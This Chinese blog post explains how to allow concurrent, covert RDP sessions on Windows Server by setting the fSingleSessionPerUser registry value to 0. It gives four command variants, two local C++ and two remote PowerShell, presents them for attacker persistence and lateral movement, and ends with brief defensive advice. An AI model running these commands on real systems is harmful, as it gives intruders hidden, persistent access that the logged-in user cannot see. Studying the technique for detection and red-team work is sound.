RDP 启用多用户会话(当前用户无感知)

vortex52025-11-10 9:12

1. 引言

在 Windows 系统中,默认情况下每个用户只能同时维持一个远程桌面协议(RDP)会话。这一限制旨在确保资源公平分配与会话隔离。然而,对于网络攻击者而言,启用多用户 RDP 会话(即允许多个并发 RDP 连接,且当前登录用户无感知)具有极高的战略价值:

  • 持久化:攻击者可在目标主机上长期驻留而不触发用户警觉;
  • 横向移动:利用已感染主机作为跳板,快速扩展至内网其他节点;
  • 权限提升:通过并行会话劫持高权限账户或执行提权操作。

攻击者通过修改 终端服务(Terminal Services) 相关的注册表键,显式关闭"每个用户仅限单一会话"的限制,即可实现上述目标。当前登录用户不会收到任何提示或中断,会话完全在后台并行运行。

重要提示 :本技术仅适用于 Windows Server 系列操作系统(如 Windows Server 2016/2019/2022)。在桌面版 Windows(如 Windows 10/11)中,RDP 默认受许可证与系统策略限制,即使修改注册表也无法启用真正意义上的多用户并发。

2. 技术实现方式

以下提供四种主流实现路径,涵盖本地执行与远程注入两种场景。所有操作均需管理员(SYSTEM)权限

方法一:本地注册表修改(策略路径)

cpp 复制代码 
// C++ 示例(需提升至管理员权限)
system("reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\" "
       "/v fSingleSessionPerUser /t REG_DWORD /d 0 /f");

说明:该键位于组策略映射区域,优先级较高,适用于域环境或 GPO 受控主机。

方法二:本地注册表修改(控制集路径)

cpp 复制代码 
// C++ 示例
system("reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" "
       "/v fSingleSessionPerUser /t REG_DWORD /d 0 /f");

说明:这是终端服务核心配置路径,修改后立即生效,无需重启服务。

方法三:远程 PowerShell 执行(策略路径)

powershell 复制代码 
Invoke-Command -ComputerName <目标主机名或IP> -ScriptBlock {
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" `
        /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
}

前提:需启用 WinRM 服务并具有远程管理权限(通常通过 PsExec、WMI 或域凭据实现)。

方法四:远程 PowerShell 执行(控制集路径)

powershell 复制代码 
Invoke-Command -ComputerName <目标主机名或IP> -ScriptBlock {
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" `
        /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
}

推荐在横向移动阶段使用,可批量处理多台内网服务器。

3. 实现效果与验证

修改完成后,无需重启终端服务或操作系统,新策略立即生效。

效果表现:

场景 行为描述
用户 A 已通过 RDP 登录 攻击者可使用用户 B 的凭据新建 RDP 会话
多个攻击者并行连接 各自会话独立运行,互不干扰
当前屏幕用户 完全无感知,无弹窗、无断开提示
任务管理器查看 可见多条 mstsc.exe / rdpclip.exe 进程

验证命令:

powershell 复制代码 
# 查看当前 RDP 会话列表
qwinsta

# 或查询注册表值
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser
# 返回:0x0 表示已禁用单会话限制

4. 安全建议(防御视角)

尽管本文从进攻角度阐述技术,但企业安全团队应关注以下加固措施:

  1. 监控注册表修改行为
    启用 Sysmon(Event ID 13)捕获对 Terminal Server 键的写操作;
  2. 限制 RDP 访问来源
    通过防火墙或 RD Gateway 限制仅允许特定 IP 发起连接;
  3. 实施最小权限原则
    禁止普通用户拥有远程登录权限;
  4. 定期轮转凭据 + MFA
    降低凭据被盗用后的影响范围。

总结

通过简单修改 fSingleSessionPerUser=0,攻击者即可在 Windows Server 上实现隐蔽、高效、持久的 RDP 多会话控制。此技术是红队演练、渗透测试及真实 APT 攻击中的标准配置之一。理解其原理与痕迹,有助于构建更完善的检测与响应机制。

相关推荐
埃博拉酱3 天前
VS Code Remote SSH 连接 Windows 服务器卡在"下载 VS Code 服务器":prcdn DNS 解析失败的诊断与 BITS 断点续传
windows·ssh·visual studio code
唐宋元明清21883 天前
.NET 本地Db数据库-技术方案选型
windows·c#
加号33 天前
windows系统下mysql多源数据库同步部署
数据库·windows·mysql
tryCbest3 天前
Windows环境下配置pip镜像源
windows·pip
呉師傅3 天前
火狐浏览器报错配置文件缺失如何解决#操作技巧#
运维·网络·windows·电脑
百事牛科技3 天前
保护文档安全:PDF限制功能详解与实操
windows·pdf
一个人旅程~3 天前
如何用命令行把win10/win11设置为长期暂停更新?
linux·windows·经验分享·电脑
一个假的前端男4 天前
[特殊字符] Flutter 安装完整指南 Windows—— 2026最新版
windows·flutter
一名优秀的码农4 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp4 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
热门推荐
01GitHub 镜像站点02【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆03OpenClaw 使用和管理 MCP 完全指南04OpenClaw + 飞书(Feishu)环境搭建指南05Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤06OpenClaw优化飞书API 额度已耗尽问题07Window 10部署openclaw报错node.exe : npm error code 12808Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services09OpenClaw 接入阿里云百炼 Coding Plan 指南10本地部署 OpenClaw + DeepSeek-R1 完全指南